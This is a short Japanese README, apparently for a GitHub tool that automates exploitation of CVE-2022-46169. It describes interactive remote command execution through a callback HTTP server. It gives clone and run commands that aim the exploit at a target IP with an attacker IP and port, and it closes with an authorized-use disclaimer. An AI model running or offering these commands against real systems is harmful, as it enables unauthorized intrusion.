
この Python スクリプトは、ペイロードの配信とレスポンス処理を自動化することで、CVE-2022-46169 の悪用を支援します。HTTP サーバーを起動し、リクエストを待ち受け、脆弱なターゲットとリアルタイムにやり取りするためのコマンド入力を可能にします。
このPythonスクリプトは、CVE-2022-46169の脆弱性を悪用するプロセスを効率化するための補助ツールです。受信リクエストを待ち受けるHTTPサーバーを起動し、ユーザーがコマンドを入力するためのシンプルなインターフェースを提供します。入力されたコマンドはターゲットサーバー上で実行され、脆弱なサーバーに細工したペイロードを送信し、その応答をリアルタイムで観察するプロセスを自動化します。
このスクリプトを利用することで、ユーザーは脆弱なサーバーに細工したペイロードを送信し、その応答をリアルタイムで観察するプロセスを自動化できます。
git clone [email protected]:ahanel13/ImprovedShell-for-CVE-2022-46169.git
cd ImprovedShell-for-CVE-2022-46169
python CVE-2022-46169_helper.py -h
python3 CVE-2022-46169_helper.py --target http://10.10.11.211 --ip 10.10.14.86 --port 5000

このスクリプトは教育目的および合法的な使用のみを目的としています。ペネトレーションテストやセキュリティ評価を行う際は、必ず適切な許可を得てください。